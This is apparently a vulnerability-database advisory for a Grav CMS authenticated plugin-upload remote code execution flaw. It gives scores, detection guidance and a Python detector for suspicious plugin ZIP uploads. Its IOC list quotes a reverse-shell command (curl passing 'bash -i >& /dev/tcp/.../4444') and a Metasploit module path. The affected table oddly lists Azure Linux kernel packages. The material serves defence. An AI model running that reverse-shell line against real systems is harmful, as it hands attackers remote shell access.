cbcvebase.
CVE-2025-50286
published 2025-08-06

Priority: P2 · 69 · high · CVSS 3.1 base score 8.1
Vector: AV:N / AC:H / PR:N / UI:N / S:U / C:H / I:H / A:H
Exploit: public (Metasploit module path listed under Detection & IOCs)
EPSS: 8.71% (94.5th percentile)
A Remote Code Execution (RCE) vulnerability in Grav CMS v1.7.48 allows an authenticated admin to upload a malicious plugin via the /admin/tools/direct-install interface. Once uploaded, the plugin is automatically extracted and loaded, allowing arbitrary PHP code execution and reverse shell access.

Affected (3 ranges)

Vendor   | Product                                      | Version range | Fixed in
getgrav  | grav                                         | (not listed)  | (not listed)
msrc     | azl3_kernel_6.6.57.1-7_on_azure_linux_3.0    | (not listed)  | (not listed)
msrc     | cbl2_kernel_5.15.180.1-1_on_cbl_mariner_2.0  | (not listed)  | (not listed)

Detection & IOCs (extracted from sources)

url       /admin/tools/direct-install
path      multi/http/grav_admin_direct_install_rce_cve_2025_50286
filename  evilplugin.php
filename  blueprints.yaml
command   curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http:///
  • Monitor HTTP POST requests to /admin/tools/direct-install containing ZIP file uploads; malicious archives follow the structure of a plugin directory with a PHP file and blueprints.yaml.
  • Alert on web server processes (e.g., www-data/apache2) spawning outbound TCP connections or bash reverse shells, particularly to non-standard ports such as 4444.
  • Detect newly created PHP files under the Grav plugins directory following a ZIP upload to the Direct Install endpoint, as the uploaded plugin is written to disk and executed by the application.
  • Exploitation requires valid admin-level credentials; this is an authenticated RCE, not unauthenticated. Detection should focus on admin-authenticated sessions performing plugin uploads.
  • The Metasploit module targets Grav CMS versions 1.1.x–1.7.x with Admin Plugin 1.2.x–1.10.x; scope detection rules accordingly and do not apply to versions outside this range.
  • The NVD entry and exploit-db reference Grav CMS v1.7.48, while the Metasploit module extends coverage to <=1.7.49.5 / Admin Plugin <=1.10.49.3; ensure patching covers the full affected range.
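The first detection bullet above (POST to /admin/tools/direct-install carrying a ZIP whose layout is a plugin directory with a PHP file and blueprints.yaml) and the note that alerts should be scoped to admin-authenticated sessions can be turned into a small request inspector. The following is an added example written for this page, not code from the record's sources, Grav, or the Metasploit module. It assumes a hypothetical HttpRequest model of what a reverse proxy or WAF sees (method, path, headers, body, and a flag for an authenticated admin session); the endpoint path and the two file names come from the record, and the sample archive and multipart body are constructed, with an inert PHP placeholder instead of any payload.

```python
import io
import zipfile
from dataclasses import dataclass, field

# Endpoint and file names are taken from the record; everything else here is constructed.
DIRECT_INSTALL_PATH = "/admin/tools/direct-install"
ZIP_MAGIC = b"PK\x03\x04"


@dataclass
class HttpRequest:
    """Hypothetical view of one request as a proxy or WAF would see it."""
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    body: bytes = b""
    admin_session: bool = False  # True when the request rides on an authenticated admin session


def extract_upload_parts(content_type: str, body: bytes) -> list[bytes]:
    """Return the raw payload of each multipart/form-data part, or the whole body for a raw upload."""
    if "boundary=" not in content_type:
        return [body]
    boundary = b"--" + content_type.split("boundary=", 1)[1].strip().strip('"').encode()
    parts = []
    for chunk in body.split(boundary):
        if b"\r\n\r\n" not in chunk:
            continue  # preamble, epilogue, or the closing "--" marker
        _part_headers, data = chunk.split(b"\r\n\r\n", 1)
        if data.endswith(b"\r\n"):  # CRLF that precedes the next boundary delimiter
            data = data[:-2]
        parts.append(data)
    return parts


def inspect_archive(data: bytes) -> dict:
    """Check a ZIP payload for the plugin layout the record describes: a PHP file plus blueprints.yaml."""
    info = {"is_zip": data.startswith(ZIP_MAGIC), "php_files": [], "has_blueprints": False}
    if not info["is_zip"]:
        return info
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for name in zf.namelist():
                base = name.lower().rsplit("/", 1)[-1]
                if base.endswith(".php"):
                    info["php_files"].append(name)
                if base == "blueprints.yaml":
                    info["has_blueprints"] = True
    except zipfile.BadZipFile:
        info["is_zip"] = False  # truncated or otherwise unreadable archive
    return info


def evaluate(req: HttpRequest) -> list[str]:
    """Return detection findings for one request; an empty list means nothing to alert on."""
    findings = []
    if req.method.upper() != "POST" or req.path.rstrip("/") != DIRECT_INSTALL_PATH:
        return findings
    findings.append("post_to_direct_install")
    content_type = req.headers.get("Content-Type", "")
    for part in extract_upload_parts(content_type, req.body):
        info = inspect_archive(part)
        if not info["is_zip"]:
            continue
        findings.append("zip_upload")
        if info["php_files"] and info["has_blueprints"]:
            findings.append("plugin_layout_with_php")
    if req.admin_session and "zip_upload" in findings:
        findings.append("admin_session_plugin_upload")  # the case the record says to focus on
    return findings


def build_sample_plugin_zip() -> bytes:
    """Constructed archive mirroring the layout in the record; the PHP body is an inert placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("evilplugin/evilplugin.php", "<?php // placeholder only, no payload\n")
        zf.writestr("evilplugin/blueprints.yaml", "name: evilplugin\nversion: 0.0.1\n")
    return buf.getvalue()


def build_multipart(boundary: str, filename: str, data: bytes) -> bytes:
    """Wrap one file in a multipart/form-data body the way a browser upload would."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
        "Content-Type: application/zip\r\n\r\n"
    ).encode()
    return head + data + f"\r\n--{boundary}--\r\n".encode()


def sample_requests() -> dict:
    """Two constructed requests: a benign admin page view and a plugin ZIP pushed to Direct Install."""
    boundary = "----ConstructedBoundary1234"
    return {
        "benign": HttpRequest("GET", "/admin/plugins", admin_session=True),
        "plugin_upload": HttpRequest(
            "POST", DIRECT_INSTALL_PATH,
            headers={"Content-Type": f"multipart/form-data; boundary={boundary}"},
            body=build_multipart(boundary, "evilplugin.zip", build_sample_plugin_zip()),
            admin_session=True,
        ),
    }


if __name__ == "__main__":
    for label, req in sample_requests().items():
        print(label, evaluate(req))
```

The benign request yields no findings; the constructed upload yields post_to_direct_install, zip_upload, plugin_layout_with_php and admin_session_plugin_upload. The archive check runs on the upload itself rather than waiting for a PHP file to appear under the plugins directory, which is the earlier of the two signals the record lists; pairing it with the file-creation and outbound-connection rules from the other bullets covers the later stages.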

CVSS provenance

nvd          v3.1  8.1  HIGH  CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
vendor_msrc        7.0  HIGH